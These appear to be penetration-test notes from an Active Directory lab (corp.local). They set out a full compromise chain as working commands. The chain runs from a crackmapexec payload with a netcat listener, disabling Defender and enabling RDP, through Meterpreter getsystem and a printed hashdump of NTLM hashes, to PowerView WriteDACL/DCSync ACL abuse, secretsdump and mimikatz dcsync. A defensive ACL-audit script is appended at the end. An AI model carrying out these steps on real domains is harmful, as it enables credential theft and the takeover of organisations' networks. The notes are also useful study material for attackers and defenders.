Initial foothold and Exploitation
Getting the Shell
proxychains crackmapexec smb 172.16.1.24 -u 'cyber_adm' -p 'Password123!' --put-file large.ps1 'text.ps1'
nc -lvnp 4447
proxychains crackmapexec smb 172.16.1.24 -u 'cyber_adm' -p 'Password123!' -x "powershell .\text.ps1"
SHELL> powershell "Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name 'fDenyTSConnections' -value 0"
SHELL> powershell "Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name 'UserAuthentication' -value 1"
powershell "Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'"
RDP
## Didn't have to do the above steps with the alternate method
proxychains xfreerdp /u:cyber_adm /v:172.16.1.24 /p:Password123!
Powershell
Turn off AV
Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
#windows 7
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
Upload Meterpreter shell
Executing the shell
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > migrate 1820
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ipsec:1000:aad3b435b51404eeaad3b435b51404ee:235b3c847d4ade90c5f5186cd23803af:::
Adding User to Legacy Web Servers
PS C:\Windows\system32> net group "Legacy Web Servers" cyber_adm /add /domain
Import-Module .\powerview.ps1
WriteDACL
Combination 1
Add-DomainObjectAcl -TargetIdentity "DC=CORP,DC=LOCAL" -PrincipalIdentity cyber_adm -Domain corp.local -Rights All -Verbose
Dumping the Secrets
proxychains impacket-secretsdump 'corp.local/cyber_adm:Password123!@172.16.1.5'
WRITE DACL and DCSYNC Extra Commands
Combination 4 (Almost worked)
Add-DomainObjectAcl -TargetIdentity USERS -PrincipalIdentity cyber_adm -Domain corp.local -Rights All -Verbose
Add-DomainObjectAcl -TargetIdentity 'DC01.CORP.LOCAL' -PrincipalIdentity cyber_adm -Domain corp.local -Rights All -Verbose
Add-DomainObjectAcl -TargetIdentity "DC=CORP,DC=LOCAL" -PrincipalIdentity cyber_adm -Domain corp.local -Rights All -Verbose
Add-DomainObjectAcl -TargetIdentity DC01 -PrincipalIdentity cyber_adm -Domain corp.local -Rights All -Verbose
Import-Module .\powerview.ps1
Add-DomainObjectAcl -TargetIdentity 'CORP.LOCAL' -PrincipalIdentity 'Legacy Web Servers' -Domain corp.local -Rights DCSync -Verbose
Add-DomainObjectAcl -TargetIdentity DC01 -PrincipalIdentity 'Legacy Web Servers' -Domain corp.local -Rights DCSync -Verbose
Add-DomainObjectAcl -TargetIdentity DC01.CORP.LOCAL -PrincipalIdentity 'Legacy Web Servers' -Domain corp.local -Rights DCSync -Verbose
Add-DomainObjectAcl -TargetIdentity Users -PrincipalIdentity 'Legacy Web Servers' -Domain corp.local -Rights All -Verbose
.\mimikatz-64.exe
privilege::debug
token::elevate
lsadump::dcsync /domain:corp.local /user:pgibbons
Test commands
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | % {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | % {if ($_.Identity -eq $("$env:UserDomain\$env:UserName")) {$_}} | ? {$_.ActiveDirectoryRights -like "*"}
Get-ObjectAcl -DistinguishedName "dc=corp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
Get-ObjectAcl -SamAccountName 'Legacy Web Servers' -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "WriteDacl"}
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=corp,DC=local"}
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Users,DC=corp,DC=local" -and $_.IdentityReference -eq "CORP\Legacy Web Servers"}
([ADSI]"LDAP://CN=Legacy Web Servers,CN=Users,DC=corp,DC=local").PSBase.get_ObjectSecurity().GetOwner([System.Security.Principal.NTAccount]).Value
([ADSI]"LDAP://CN=Users,DC=corp,DC=local").PSBase.get_ObjectSecurity().GetOwner([System.Security.Principal.NTAccount]).Value
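Added defender-side check, not part of the original notes: this PowerShell audits the ACL of the domain naming context for the rights that the WriteDACL/DCSync chain above depends on (replication extended rights, WriteDacl, WriteOwner, GenericAll) using the same ADSI approach as the two commands above, without PowerView. It assumes a domain-joined host and uses the lab's "DC=CORP,DC=LOCAL" as the domain DN.

```powershell
# Audit the domain root ACL for DCSync-capable and DACL-modifying rights.
# Assumes a domain-joined host; $domainDn is the lab value from these notes.
$domainDn = "DC=CORP,DC=LOCAL"

# Well-known control-access right GUIDs for directory replication.
$replGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

$obj = [ADSI]"LDAP://$domainDn"
$acl = $obj.PSBase.ObjectSecurity   # System.DirectoryServices.ActiveDirectorySecurity

# Walk explicit and inherited Allow ACEs, resolving SIDs to NTAccount names.
$findings = foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    $rights = $ace.ActiveDirectoryRights.ToString()
    $reason = $null
    if     ($rights -match 'GenericAll') { $reason = 'GenericAll' }
    elseif ($rights -match 'WriteDacl')  { $reason = 'WriteDacl' }
    elseif ($rights -match 'WriteOwner') { $reason = 'WriteOwner' }
    elseif ($rights -match 'ExtendedRight') {
        $g = $ace.ObjectType.ToString()
        # All-zero GUID means every extended right, which includes replication.
        if ($g -eq '00000000-0000-0000-0000-000000000000') { $reason = 'All extended rights' }
        elseif ($replGuids.ContainsKey($g)) { $reason = $replGuids[$g] }
    }
    if ($reason) {
        [pscustomobject]@{
            Principal = $ace.IdentityReference.Value
            Right     = $reason
            Inherited = $ace.IsInherited
        }
    }
}

# Expected holders are Domain Controllers, Enterprise Domain Controllers,
# Administrators, Domain Admins and Enterprise Admins; anything else (such as a
# group like "Legacy Web Servers" or a plain user) is worth a review.
$findings | Sort-Object Principal | Format-Table -AutoSize
```

Run it before and after a change like the Add-DomainObjectAcl commands above and the new Principal/Right rows show exactly what was granted; the same ACE changes also surface in Security event 5136 on the DC when directory service change auditing is enabled.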